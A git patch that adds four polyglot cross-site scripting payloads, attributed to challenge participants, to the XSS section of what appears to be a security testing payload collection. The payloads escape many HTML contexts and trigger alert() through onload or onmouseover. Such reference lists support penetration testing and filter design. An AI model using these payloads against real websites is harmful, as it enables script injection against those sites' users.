From 86db6b7f6fc341a6acfd9e2a11edda1340c9bdfd Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Wed, 31 Oct 2018 23:41:11 +0100
Subject: [PATCH] Polyglot XSS from @filedescriptor's Polyglot Challenge

---
 XSS injection/README.md | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

diff --git a/XSS injection/README.md b/XSS injection/README.md
index f5c7b15..9650203 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -354,6 +354,22 @@ Polyglot XSS - [@s0md3v](https://twitter.com/s0md3v/status/966175714302144514)
 <svg%0Ao%00nload=%09((pro\u006dpt))()//
 ```
 
+Polyglot XSS - from [@filedescriptor's Polyglot Challenge](http://polyglot.innerht.ml)
+
+```javascript
+# by crlf
+javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
+
+# by europa
+javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>
+
+# by EdOverflow
+javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>
+
+# by h1/ragnar
+javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`
+```
+
 ## Filter Bypass and exotic payloads
 
 Bypass case sensitive